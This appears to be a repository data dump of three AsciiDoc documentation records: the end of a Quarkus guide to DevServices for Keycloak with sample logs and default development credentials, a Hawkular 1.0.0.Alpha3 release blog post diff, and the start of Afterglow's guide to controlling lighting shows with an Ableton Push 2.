quarkus:dev\n\n2021-06-04 16:22:47,175 INFO [\ud83d\udc33 .io\/keycloak\/keycloak:14.0.0]] (build-38) Creating container for image: quay.io\/keycloak\/keycloak:14.0.0\n2021-06-04 16:22:47,243 INFO [\ud83d\udc33 .io\/keycloak\/keycloak:14.0.0]] (build-38) Starting container with ID: 6469f6db9cec2c855fcc6c8db4273944cc9d69e8f6803a0b47eb2d5b8f5b94fd\n2021-06-04 16:22:47,629 INFO [\ud83d\udc33 .io\/keycloak\/keycloak:14.0.0]] (build-38) Container quay.io\/keycloak\/keycloak:14.0.0 is starting: 6469f6db9cec2c855fcc6c8db4273944cc9d69e8f6803a0b47eb2d5b8f5b94fd\n2021-06-04 16:22:47,643 INFO [org.tes.con.wai.str.HttpWaitStrategy] (build-38) \/elastic_lovelace: Waiting for 60 seconds for URL: http:\/\/localhost:32812\/auth (where port 32812 maps to container port 8080)\n2021-06-04 16:23:07,665 INFO [\ud83d\udc33 .io\/keycloak\/keycloak:14.0.0]] (build-38) Container quay.io\/keycloak\/keycloak:14.0.0 started in PT5.500489S\n...\n2021-06-04 16:23:11,155 INFO [io.quarkus] (Quarkus Main Thread) security-openid-connect-quickstart 1.0.0-SNAPSHOT on JVM (powered by Quarkus 999-SNAPSHOT) started in 25.968s. Listening on: http:\/\/localhost:8080\n2021-06-04 16:23:11,157 INFO [io.quarkus] (Quarkus Main Thread) Profile dev activated. 
Live Coding activated.\n----\n\nThe `quay.io\/keycloak\/keycloak:14.0.0` Keycloak image is used by default to start a container. `quarkus.keycloak.devservices.image-name` can be used to change a Keycloak image name.\n\nNow open the main Dev UI page and you will see the `OpenId Connect Card` linking to a `Keycloak` page:\n\nimage::dev-ui-oidc-keycloak-card.png[alt=Dev UI OpenId Connect Card,role=\"center\"]\n\nClick on the `Provider: Keycloak` link and you will see a Keycloak page which will be presented slightly differently depending on how `DevServices for Keycloak` feature has been configured.\n\n=== Testing Service Applications\n\nBy default the Keycloak page can be used to support the development of a link:security-openid-connect[Quarkus OIDC service application].\n\n==== Implicit Grant\n\nIf you set `quarkus.keycloak.devservices.grant.type=implicit` in `applicatin.properties` (this is a default value) then an `implicit` grant will be used to acquite both access and ID tokens.\nUsing this grant is recommended to emulate a typical flow where a `Singe Page Application` acquires the tokens and uses them to access Quarkus services.\n\nFirst you will see an option to `Log into Single Page Application`:\n\nimage::dev-ui-keycloak-sign-in-to-spa.png[alt=Dev UI OpenId Connect Keycloak Page - Log into Single Page Application,role=\"center\"].\n\nNext, after you select this option, you will be redirected to Keycloak to authenticate, example, as `alice:alice` and then returned to the page representing the SPA: \n\nimage::dev-ui-keycloak-test-service-from-spa.png[alt=Dev UI OpenId Connect Keycloak Single Page Application,role=\"center\"].\n\nHere you can test the service with either the access token or ID token (note ID token will be sent as a regular bearer token).\n\nFinally you can click a `Logged in` option if you'd like to log out and authenticate to Keycloak as a different user.\n\n==== Password Grant\n\nIf you set `quarkus.keycloak.devservices.grant.type=password` in `applicatin.properties` then you will see a screen like this one:\n\nimage::dev-ui-keycloak-password-grant.png[alt=Dev UI OpenId Connect Keycloak Page - Password Grant,role=\"center\"]\n\nEnter a registered user name, a relative service endpoint path, click on `Test Service` and you will see a status code such as `200`, `403`, `401` or `404` printed.\n\nYou will also see in the Dev UI console something similar to:\n\n[source,shell]\n----\n2021-07-19 17:58:11,407 INFO [io.qua.oid.dep.dev.key.KeycloakDevConsolePostHandler] (security-openid-connect-quickstart-dev.jar) (DEV Console action) Getting token from 'http:\/\/localhost:32818\/auth\/realms\/quarkus\/protocol\/openid-connect\/token' for user 'alice' in realm 'quarkus' using client id 'quarkus-app'\n2021-07-19 17:58:11,533 INFO [io.qua.oid.dep.dev.key.KeycloakDevConsolePostHandler] (security-openid-connect-quickstart-dev.jar) (DEV Console action) Test token: eyJhbGciOiJSUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICJ6Z2tDazJQZ1JaYnVlVG5kcTFKSW1sVnNoZ2hhbWhtbnBNcXU0QUt5MnJBIn0.ey...\n2021-07-19 17:58:11,536 INFO [io.qua.oid.dep.dev.key.KeycloakDevConsolePostHandler] (security-openid-connect-quickstart-dev.jar) (DEV Console action) Sending token to 'http:\/\/localhost:8080\/api\/admin'\n2021-07-19 17:58:11,674 INFO [io.qua.oid.dep.dev.key.KeycloakDevConsolePostHandler] (security-openid-connect-quickstart-dev.jar) (DEV Console action) Result: 200\n----\n\nA token is acquired from Keycloak using a `password` grant and is sent to the service endpoint.\n\n==== Client Credentials Grant\n\nIf 
you set `quarkus.keycloak.devservices.grant.type=client` then a `client_credentials` grant will be used to acquite a token, with the page showing no `User` field in this case:\n\nimage::dev-ui-keycloak-client-credentials-grant.png[alt=Dev UI OpenId Connect Keycloak Page - Client Credentials Grant,role=\"center\"].\n\nYou can test the service the same way as with the `Password` grant.\n\n=== Developing OpenId Connect Web App Applications\n\nIf you develop a link:security-openid-connect-web-authentication[Quarkus OIDC web-app application] then you should set `quarkus.oidc.application-type=web-app` in `application.properties` before starting an application.\n\nYou will see a screen like this one:\n\nimage::dev-ui-keycloak-sign-in-to-service.png[alt=Dev UI OpenId Connect Keycloak Sign In,role=\"center\"]\n\nSet a relative service endpoint path, click on `Sign In To Service` and you will be redirected to Keycloak to enter a user name and password in a new browser tab and get a response from a Quarkus application.\n\n=== Keycloak Initialization\n\nYou do not need to configure `quarkus-oidc-keycloak` to start developing your Quarkus Keycloak `OIDC` applications with the only exception is that `quarkus.oidc.application-type=web-app` has to be set in `application.properties` to give the `Keycloak` page a hint it needs to show an option to `Sign In To Service`.\n\nBy default, the `quarkus`, `quarkus-app` client with a `secret` password, `alice` and `bob` users (with the passwords matching the names), and `user` and `admin` roles are created, with `alice` given both `admin` and `user` roles and `bob` - the `user` role. \n\nUser names, secrets and their roles can be customized with `quarkus.keycloak.devservices.users` (the map which contains user names and secrets) and `quarkus.keycloak.devservices.roles` (the map which contains user names and comma separated role vales).\n\n`quarkus.oidc.client-id` and `quarkus.oidc.credentials.secret` can be used to customize the client id and secret.\n\nHowever it is likely your Keycloak configuration may be more complex and require setting more properties.\n\nThis is why `quarkus.keycloak.devservices.realm-path` is always checked first before trying to initialize Keycloak with the default or configured realm, client, user and roles properties. If the realm file exists on a file system or class path then only this realm will be used to initialize Keycloak.\n\nAlso the Keycloak page offers an option to `Sign In To Keycloak To Configure Realms` using a `Keycloak Admin` option in the right top corner:\n\nimage::dev-ui-keycloak-admin.png[alt=Dev UI OpenId Connect Keycloak Page - Keycloak Admin,role=\"center\"].\n\nSign in to Keycloak as `admin:admin` in order to further customize the realm properties or create a new realm, export the realm and have Keycloak initialized with the custom realm after a restart.\n\nNote that even if you initialize Keycloak from a realm file, it is still needed to set `quarkus.keycloak.devservices.realm-name` property for `quarkus.oidc.auth-server-url` be calculated correctly. 
Setting `quarkus.keycloak.devservices.users` property is needed if a `password` grant is used to acquire the tokens to test the OIDC `service` applications.\n\n== Disable DevServices for Keycloak\n\n`DevServices For Keycloak` will not be activated if either `quarkus.oidc.auth-server-url` is already initialized or the defaut OIDC tenant is disabled with `quarkus.oidc.tenant.enabled=false`, irrespectively of whether you work with Keycloak or not.\n\nIf you prefer not to have a `DevServices for Keycloak` container starting or do not work with Keycloak then you can also disable this feature with `quarkus.keycloak.devservices.enabled=false` - it will only be necessary if you expect to start `quarkus:dev` without `quarkus.oidc.auth-server-url`.\n\nThe main Dev UI page will include an empty `OpenId Connect Card` when `DevServices for Keycloak` is disabled:\n\nimage::dev-ui-oidc-card.png[alt=Dev UI OpenId Connect Card,role=\"center\"]\n\n== Dev Services Support for other OpenId Connect Providers\n\nYour custom extension would need to extend `quarkus-oidc` only and add the dependencies required to support your provider to the extension's `deployment` module only.\n\nThe build step dealing with the `DevServices` should additionally register two runtime properties into the \"io.quarkus.quarkus-oidc\" namespace: `oidcProviderName` (for example, `Google`) and `oidcProviderUrlBase` (for example: `mycompany.devservices-google`) for the `OpenId Connect Card` to link to the Dev UI page representing your provider, for example:\n\n[source,shell]\n----\npackage io.quarkus.oidc.okta.runtime;\n\nimport java.util.function.Supplier;\n\nimport io.quarkus.runtime.annotations.Recorder;\n\n\/\/ This simple recorder is the only code which will be located in the extension's `runtime` module\n@Recorder\npublic class OktaDevServicesRecorder {\n\n public Supplier<String> getProviderName() {\n return new Supplier<String>() {\n\n @Override\n public String get() {\n return \"OKTA\";\n }\n };\n }\n\n public Supplier<String> getProviderUrlBase() {\n return new Supplier<String>() {\n\n @Override\n public String get() {\n return \"io.quarkus\" + \".\" + \"quarkus-oidc-okta\";\n }\n };\n }\n}\n\n\npackage io.quarkus.oidc.okta.deployment.devservices;\n\nimport static io.quarkus.deployment.annotations.ExecutionTime.RUNTIME_INIT;\n\nimport java.util.Optional;\n\nimport io.quarkus.deployment.IsDevelopment;\nimport io.quarkus.deployment.annotations.BuildProducer;\nimport io.quarkus.deployment.annotations.BuildStep;\nimport io.quarkus.deployment.annotations.Consume;\nimport io.quarkus.deployment.annotations.Record;\nimport io.quarkus.deployment.builditem.RuntimeConfigSetupCompleteBuildItem;\nimport io.quarkus.devconsole.spi.DevConsoleRouteBuildItem;\nimport io.quarkus.devconsole.spi.DevConsoleRuntimeTemplateInfoBuildItem;\n\npublic class OktaDevConsoleProcessor {\n\n @BuildStep(onlyIf = IsDevelopment.class)\n @Record(value = RUNTIME_INIT)\n public void setOidcProviderProperties(BuildProducer<DevConsoleRuntimeTemplateInfoBuildItem> provider,\n OktaDevServicesRecorder recorder,\n Optional<DevServicesConfigBuildItem> configProps) {\n if (configProps.isPresent()) {\n provider.produce(new DevConsoleRuntimeTemplateInfoBuildItem(\"io.quarkus\", \"quarkus-oidc\", \"oidcProviderName\",\n recorder.getProviderName()));\n provider.produce(new DevConsoleRuntimeTemplateInfoBuildItem(\"io.quarkus\", \"quarkus-oidc\", \"oidcProviderUrlBase\",\n recorder.getProviderUrlBase()));\n }\n }\n}\n\n----\n\nAdditionally, the extension should produce 
`quarkus.oidc.deployment.devservices.OidcProviderBuildItem` to disable the default `DevServices for Keycloak`, instead of the users having to type `quarkus.keycloak.devservices.enabled=false`.\n\nPlease follow the link:dev-ui[Dev UI] tutorial as well as check the `quarkus-oidc\/deployment` source for more ideas.\n\n== References\n\n* link:dev-ui[Dev UI]\n* https:\/\/www.keycloak.org\/documentation.html[Keycloak Documentation]\n* https:\/\/openid.net\/connect\/[OpenID Connect]\n* link:security-openid-connect[Quarkus - Using OpenID Connect to Protect Service Applications using Bearer Token Authorization]\n* link:security-openid-connect-web-authentication[Quarkus - Using OpenID Connect to Protect Web Applications using Authorization Code Flow]\n* link:security[Quarkus Security]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3998bd46fd12bb3678ea1ecb056c31e65d2a664b","subject":"Substitute link to G+ demo hangout with YT-Link","message":"Substitute link to G+ demo hangout with YT-Link\n","repos":"jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,ppalaga\/hawkular.github.io,lzoubek\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,lzoubek\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/07\/30\/hawkular-1.0.0.Alpha3-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/07\/30\/hawkular-1.0.0.Alpha3-released.adoc","new_contents":"= Hawkular, all good things make three!\nHeiko Rupp\n2015-07-30\n:jbake-type: post\n:jbake-status: published\n:jbake-tags: blog, hawkular, release\n\nWe are very happy to release the third version of Hawkular!\nAs with the previous one, this was the most important release of Hawkular so far.\n\n== App server support\n\nThe main focus of this release clearly was the extended monitoring of http:\/\/www.wildfly.org\/[WildFly] application\nservers.\n\n\nNOTE: For the moment you will need to instrument your server manually following\nhttp:\/\/www.hawkular.org\/docs\/user\/getting-started.html#_install_a_wildfly_monitoring_agent[these instructions].\nWe will make this easier in the future.\n\nDeployments in the monitored server can now be enabled\/disabled and redeployed. 
Deployment of new content\nwill come in the next release.\n\n[[img-server-deploy-detail]]\nifndef::env-github[]\nimage::\/img\/blog\/2015\/1.0.0.Alpha3_deploy_actions.png[Hawkular server deployments,500,align=\"center\",link=\"\/img\/blog\/2015\/1.0.0.Alpha3_deploy_actions.png\"]\nendif::[]\nifdef::env-github[]\nimage::..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_deploy_actions.png[Hawkular server deployments,200,align=\"center\",link=\"..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_deploy_actions.png\"]\nendif::[]\n\nWe also have a new _web_-tab that gives statistics about the web subsystem of the managed WildFly.\n\n[[img-webtab]]\nifndef::env-github[]\nimage::\/img\/blog\/2015\/1.0.0.Alpha3_web_tab.png[Wildfly servers web stats,500,align=\"center\",link=\"\/img\/blog\/2015\/1.0.0.Alpha3_web_tab.png\"]\nendif::[]\nifdef::env-github[]\nimage::..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_web_tab.png[Wildfly servers web stats,200,align=\"center\",link=\"..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_web_tab.png\"]\nendif::[]\n\n== More details for URLs\n\nHawkular now also collects the current IP address and the server information for the URLs being monitored.\n\n[[img-url-detail]]\nifndef::env-github[]\nimage::\/img\/blog\/2015\/1.0.0.Alpha3_url_traits.png[URL details,500,align=\"center\",link=\"\/img\/blog\/2015\/1.0.0.Alpha3_url_traits.png\"]\nendif::[]\nifdef::env-github[]\nimage::..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_url_traits.png[URL details,200,align=\"center\",link=\"..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_url_traits.png\"]\nendif::[]\n\n\n== Notable changes in this release\n\n\n* Implemented more app server details, as mentioned above\n* Upgraded underlying versions of Hawkular-Metrics and other subsystems\n* More alerting capabilities\n\nHead over to the link:\/releasenotes\/1.0.0.Alpha3.html[Full release notes] for more details.\n\n\n== Demo\n\nWe have again run a demonstration of the new Hawkular features:\n\nvideo::otLyoXYlV-s[youtube,width=600,height=400]\n\nWe plan to do a lot more Alpha releases with even more features; the next Alpha is planned for August 26th, and\nlink:\/docs\/dev\/development.html[you can help us] :)\n\nThank you for the contributions!\n\n== Downloads\n\nYou can download the release here:\n\n* http:\/\/download.jboss.org\/hawkular\/hawkular\/1.0.0.Alpha3\/hawkular-dist-1.0.0.Alpha3.zip[Hawkular 1.0.0.Alpha3 (zip)]\n* http:\/\/download.jboss.org\/hawkular\/hawkular\/1.0.0.Alpha3\/hawkular-dist-1.0.0.Alpha3.tar.gz[Hawkular 1.0.0.Alpha3\n(tar.gz)]\n\n== What's next?\n\nDuring the weeks until the next release and demo we want to address the following:\n\n* More details of the application servers\n* Uploading of new applications into managed servers\n* More alerting-related changes\n* An easier to grasp resource naming schema\n* Hopefully, definition of JDBC drivers and data sources\n","old_contents":"= Hawkular, all good things make three!\nHeiko Rupp\n2015-07-30\n:jbake-type: post\n:jbake-status: published\n:jbake-tags: blog, hawkular, release\n\nWe are very happy to release the third version of Hawkular!\nAs with the previous one, this was the most important release of Hawkular so far.\n\n== App server support\n\nThe main focus of this release clearly was the extended monitoring of http:\/\/www.wildfly.org\/[WildFly] application\nservers.\n\n\nNOTE: For the moment you will need to instrument your server manually 
following\nhttp:\/\/www.hawkular.org\/docs\/user\/getting-started.html#_install_a_wildfly_monitoring_agent[these instructions].\nWe will make this easier in the future.\n\nDeployments in the monitored server can now be enabled\/disabled and redeployed. Deployment of new content\nwill come in the next release.\n\n[[img-server-deploy-detail]]\nifndef::env-github[]\nimage::\/img\/blog\/2015\/1.0.0.Alpha3_deploy_actions.png[Hawkular server deployments,500,align=\"center\",link=\"\/img\/blog\/2015\/1.0.0.Alpha3_deploy_actions.png\"]\nendif::[]\nifdef::env-github[]\nimage::..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_deploy_actions.png[Hawkular server deployments,200,align=\"center\",link=\"..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_deploy_actions.png\"]\nendif::[]\n\nWe also have a new _web_-tab that gives statistics about the web subsystem of the managed WildFly\n\n[[img-webtab]]\nifndef::env-github[]\nimage::\/img\/blog\/2015\/1.0.0.Alpha3_web_tab.png[Wildfly servers web stats,500,align=\"center\",link=\"\/img\/blog\/2015\/1.0.0.Alpha3_web_tab.png\"]\nendif::[]\nifdef::env-github[]\nimage::..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_web_tab.png[Wildfly servers web stats,200,align=\"center\",link=\"..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_web_tab.png\"]\nendif::[]\n\n== More details for URLs\n\nHawkular now also collects the current IP address and the server information for the URLs being monitored\n\n[[img-url-detail]]\nifndef::env-github[]\nimage::\/img\/blog\/2015\/1.0.0.Alpha3_url_traits.png[URL details,500,align=\"center\",link=\"\/img\/blog\/2015\/1.0.0.Alpha3_url_traits.png\"]\nendif::[]\nifdef::env-github[]\nimage::..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_url_traits.png[URL details,200,align=\"center\",link=\"..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_url_traits.png\"]\nendif::[]\n\n\n== Notable changes in this release were:\n\n\n* Implement more app server details as mentioned above\n* Upgrade underlying versions of Hawkular-Metrics and other subsystems\n* More alerting capabilities\n\nHead over to the link:\/releasenotes\/1.0.0.Alpha3.html[Full release notes] for more details.\n\n\n== Demo\n\nWe will again run a demonstration of the new Hawkular features link:https:\/\/plus.google.com\/events\/c1o2qnm1gof3iu45egshccq3hho[here].\n\nWe plan to do a lot more Alpha releases with even more features, the next Alpha is planned for August 26th, and\nlink:\/docs\/dev\/development.html[you can help us] :)\n\nThank you for the contributions!\n\n== Downloads\n\nYou can download the release here:\n\n* http:\/\/download.jboss.org\/hawkular\/hawkular\/1.0.0.Alpha3\/hawkular-dist-1.0.0.Alpha3.zip[Hawkular 1.0.0.Alpha3 (zip)]\n* http:\/\/download.jboss.org\/hawkular\/hawkular\/1.0.0.Alpha3\/hawkular-dist-1.0.0.Alpha3.tar.gz[Hawkular 1.0.0.Alpha3\n(tar.gz)]\n\n== What's next?\n\nDuring the weeks until the next release and demo we want to address the following:\n\n* More details of the application servers\n* Uploading of new applications into managed servers\n* More alerting related changes\n* An easiert to grasp resource naming schema\n* Hopefully definition of jdbc drivers and data sources\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75196bfc8aa1ba8fdc96b0f749e7dfb9bb6d5518","subject":"Fix inbound link.","message":"Fix inbound link.\n\nAlso clean up attributes section and fix footer using 
partial.\n","repos":"brunchboy\/afterglow,brunchboy\/afterglow,brunchboy\/afterglow","old_file":"doc\/modules\/ROOT\/pages\/push2.adoc","new_file":"doc\/modules\/ROOT\/pages\/push2.adoc","new_contents":"= Using Ableton Push 2\nJames Elliott <james@deepsymmetry.org>\n:toc:\n:toc-placement: preamble\n\nSome controllers have such rich capabilities that they deserve their\nown custom mapping implementations to exploit those capabilities as a\nshow control interface. The Push 2 called out for such treatment, and\nthankfully in March 2016 Ableton published\nhttps:\/\/github.com\/Ableton\/push-interface\/blob\/master\/doc\/AbletonPush2MIDIDisplayInterface.asc[documentation]\nwhich made that possible, and a\n{api-doc}afterglow.controllers.ableton-push-2.html[mapping] has been\ncreated. You can use it to do most of the things that you would use\nthe <<README#web-ui,web interface>> for, often with deeper control,\nsince you can press multiple cue trigger pads at the same time, and\nthey respond to variations in pressure.\n\nNOTE: Although this page discusses the second version of the Push\ncontroller, with a graphical display, there is also a page describing\nthe <<push#using-ableton-push,original Push mapping>>, which is still\nfully supported.\n\n== Binding to the Push 2\n\nAssuming you have an Ableton Push 2 connected to the machine running\nAfterglow and powered on, it will be noticed, identified, and\nactivated as soon as you have set up the sample show. You will see a\nbrief startup animation, and Afterglow's Push 2 interface will appear.\n\nTIP: For information about how to set up bindings without the sample\nshow, or more details about how it works, see\n<<mapping_sync#setting-up-grid-controller-bindings,Setting Up Grid\nController Bindings>>.\n\nHere is an overview of how the Push 2 mapping works, with details\nexplained in the upcoming sections:\n\nimage::Push2NoEffects.jpg[Push 2 interface]\n\nThe most exciting innovation that the Push 2 adds to the already\nexcellent Push experience is the color graphic display, and Afterglow\ncan take full advantage of it, as this example shows:\n\nimage::Example.gif[Afterglow graphic animation]\n\n[[show-control]]\n== Show Control\n\nOnce you have the Push 2 bound to a show, it becomes a very direct and\ntactile way to monitor and control the cues and other aspects of the\nshow.\n\nThe graphical display at the top of the Push displays the effects\ncurrently running, and can optionally display\n<<metronome-control,metronome>> information as well. If a cue was\ndefined with adjustable variables for its effect, they will also be\ndisplayed, and you will be able to <<effect-control,adjust>> them by\nturning the encoder above the variable.\n\nThe rightmost encoder, past the display, adjusts the show Grand\nMaster, which controls the maximum brightness that any dimmer cue can\nachieve, so you can always use it to adjust the overall brightness of\nthe show. As soon as you touch the encoder, the Grand Master level\nwill appear along with a gauge representing what fraction of its\nmaximum level is currently in effect, and both will be updated as you\nturn the encoder. 
When you release it, the display returns to showing\nwhatever it was before.\n\nimage::GrandMaster2.jpg[Grand Master adjustment]\n\nAs with other numeric values that you can adjust, while you are\nadjusting the Grand Master, the touch strip on the left-hand side of\nthe Push will light up in the same proportion as the circular gauge\nin the display under the encoder, and you can touch or drag on the\nstrip to instantly set the level to whatever value you want.\n\nThe red kbd:[▷] button at the bottom left of the cue grid\ncan be used to temporarily shut down the show, blacking out all\nuniverses that it controls, and suspending the processing of its\neffects.\n\nimage::ShowStop2.jpg[Show stopped]\n\nWhenever the show is stopped, the kbd:[▷] button turns green to\nrepresent \u201cPlay\u201d. Pressing it in this state restarts the show where it\nwould have been had it not stopped.\n\n== Cues\n\nMost of the space on the interface is dedicated to an 8×8 grid\nof color-coded cue trigger pads, which provide a window onto the\nshow's overall <<cues#cues,cue grid>>. The Push 2 can be\n<<README#scrolling-and-linked-controllers,linked>> to the\n<<README#web-ui,web interface>> so that both always display the same\nsection of the cue grid, and the web interface can remind you of the\nnames of the cues you are looking at, or it can be scrolled\nindependently, allowing you access to more cues at the same time.\n\nTIP: If you have more than one compatible grid controller, you can\nhave Afterglow use all of them at the same time; each can be\nscrolled to different areas of the cue grid, and each can even be\nlinked to a different browser window if you have that much screen\nspace.\n\nYou can activate any cue shown by pressing its pad; running cues will\nlight up, and darken again when they end. The effects which cues\ncreate will also appear in the display above the cue pad, from left to\nright, with the most recent effect on the right. The labels containing\nthe effect name are drawn in the same color as the cue pad used to\nlaunch the effect, to help keep track of which is which. In the photo\nbelow, “Sparkle” is the most recent effect, and it has two\nvariables, `chance` and `Fade`, which can be adjusted by turning the\nencoders above them. The `chance` value is changing because it is\nconfigured to also be adjusted through the pressure-sensitive cue pad\nthat was used to launch it.\n\nimage::SparklePressure2.jpg[Sparkle effect, adjusting chance variable]\n\nTo stop a running cue, press its pad again, or press the red kbd:[End]\npad underneath its effect entry in the display. Some cues will end\nimmediately; others will continue to run until they reach what they\nfeel is an appropriate stopping point. While they are in the process\nof ending, the cue pad will blink, and the kbd:[End] pad will be\nlabeled kbd:[Ending]. If you want the cue to end immediately even\nthough it would otherwise run for a while longer, you can press the\nblinking cue pad (or effect kbd:[Ending] pad) again and it will be\nkilled right then.\n\nThe colors assigned to cue pads by the creator of the cue grid are\nintended to help identify related cues. The same color is used in the\ncue label at the bottom of the graphical display, to help keep track\nof which cue came from where.\n\nSome cues (especially intense ones like strobes) are configured to run\nonly as long as they are held down. 
In that case, when you press a cue\npad, it lights up with a whitened version of the cue color as a hint\nthat this is happening, and as soon as you release the pad, the cue\nwill end. If you want to override this behavior, you can hold down the\nkbd:[Shift] button (towards the bottom right of the Push) as you press\nthe cue pad, and it will activate as a normal cue, staying on until\nyou press its pad a second time.\n\nAs noted above, cues can also be configured to take advantage of the\npressure sensitivity of the Push cue pads, so that as you vary the\npressure with which you are holding down the pad, some visible\nvariable of the cue is altered. The strobe and sparkle cues\ncreated by\n{api-doc}afterglow.examples.html#var-make-cues[`afterglow.examples\/make-cues`]\nfor the sample show work this way: the intensity and lightness of the\nstrobe are increased by pressure, and so is the chance that a sparkle\nwill be assigned to a light on each frame. You can see these\nvariables change in the display above the cue's effect name while\nyou are adjusting them, as shown in the photo above.\n\n[[exclusivity]]Cues may be mutually exclusive by nature, and if they\nwere created to reflect this (by using the same keyword to register\ntheir effects with the show, or specifying other effect keys in their\n`:end-keys` list), when you activate one, the other cues which use the\nsame keyword are dimmed. This is a hint that when you activate one of\nthem, it will _replace_ the others, rather than running at the same\ntime. In the photo <<gobo-photo,below>>, the rest of the\nTorrent 1 fixed gobo cues (the leftmost blue cues) are dimmed because\nthey would replace the running “T1 atom shake” cue.\n\n== Scrolling\n\nThe show will likely have many more cues than fit on the pad grid; the\ndiamond of arrow buttons to the right of the top of the cue grid allows\nyou to page through the larger show grid. If there are more cues\navailable in a given direction, that arrow will be lit, otherwise it\nis dark. Pressing an active arrow scrolls the view one\n“page” in that direction. In the photo below, it is\ncurrently possible to scroll up and to the right:\n\nimage::PushScroll2.jpg[Push 2 scroll diamond,286]\n\nIf you hold down the kbd:[Shift] button, the arrows will scroll you as\nfar as possible in the direction that you press.\n\nThe kbd:[Page <] and kbd:[> Page] buttons (toward the bottom right,\njust above kbd:[Shift]) allow you to scroll the graphical display left\nand right, to see and <<effect-control,adjust>> all of the currently\nrunning effects, even though only four at a time (or three, if the\n<<metronome-control,metronome section>> is showing) fit in the\ndisplay.\n\nPressing the kbd:[Page <] button scrolls the display left, showing you older\n(or lower priority) effects, and kbd:[> Page] scrolls to the right,\nshowing you newer and higher priority effects. Pressing these buttons\nwhile kbd:[Shift] is held will scroll as far as possible in the\ncorresponding direction. (As illustrated in the photo below, in\naddition to lighting up the kbd:[Page <] and kbd:[> Page] buttons when\nthere are effects off the screen in that direction, Afterglow draws\n`<` and `>` markers below the effect name labels at the corresponding\nedge of the screen.)\n\nimage::Push2Page.jpg[Push 2 page arrows]\n\n== Effect Control\n\nEffects, whether created by cues or other code, appear in the display\narea, and can be scrolled through and ended by pressing the\ncorresponding red kbd:[End] pad which appears underneath them. 
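\n\nFor reference, cues with the held and pressure-sensitive behaviors described earlier are registered in the show's cue grid from Clojure code. Here is a rough sketch of such a cue, loosely modeled on the helpers in {api-doc}afterglow.examples.html[`afterglow.examples`] (the grid coordinates, variable range, and cue keyword are arbitrary illustrations rather than values from the sample show):\n\n[source,clojure]\n----\n(require '[afterglow.controllers :as ct]\n         '[afterglow.effects.cues :as cues]\n         '[afterglow.effects.dimmer :refer [dimmer-effect]]\n         '[afterglow.show :as show]\n         '[afterglow.show-context :refer [*show*]])\n\n;; Register a dimmer cue at grid coordinates (0, 7). :held ends the\n;; cue when the pad is released, and :velocity ties the level\n;; variable to the pressure with which the pad is pressed.\n(ct\/set-cue! (:cue-grid *show*) 0 7\n             (cues\/cue :dimmers\n                       (fn [var-map]\n                         (dimmer-effect (:level var-map 255)\n                                        (show\/all-fixtures)))\n                       :color :red\n                       :held true\n                       :variables [{:key \"level\" :min 0 :max 255\n                                    :start 255 :name \"Level\"\n                                    :velocity true}]))\n----\n\n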
There\nare many ways you can interact with running effects:\n\n=== Numeric Cue Variables\n\nIf the effect was created by a cue that has numeric variables assigned\nto it, the variable names and values will appear above the effect\nname. The values can be adjusted using the encoder knob above the\nvariable. For example, in addition to varying the sparkle `chance`\nvariable using the pad pressure, as was done above, its `Fade`\nvariable can be adjusted using the effect variable encoder above it.\nAs soon as you touch the encoder knob associated with a variable, the\ngauge underneath its value brightens to indicate that you are\nadjusting it, and updates as you turn the encoder to change the value.\nIn the photo below, the `Confetti Dance` cue's `Min Last` variable is\nbeing adjusted.\n\nimage::AdjustingConfetti.jpg[Adjusting Min Last variable,693]\n\nAnd here is how the effect's display section updates while the value\nis being adjusted:\n\nimage::min-last.gif[Adjusting Min Last Animation]\n\nWhile you are adjusting the variable, the large touch strip on the\nleft hand side of the Push lights up to show you where you are in the\nvariable range, and you can touch and drag on the strip to instantly\nset the variable to another value.\n\nimage::AdjustingConfetti2.jpg[Adjusting and touch strip]\n\nMost numeric variables will have values that grow from the bottom of\nthe touch strip, but variables marked as `:centered` when created,\nlike Pan and Tilt, grow from the center up or down. (Their graphical\ngauges grow from the center as well.)\n\nimage::AdjustingCentered2.jpg[Adjusting centered cue variables]\n\nimage::pan-tilt.gif[Adjusting centered variable animation]\n\nIf an effect has only one adjustable variable, it will take up the\nentire effect area, and you can use either encoder to adjust it, as\nwhen adjusting a gobo shaking 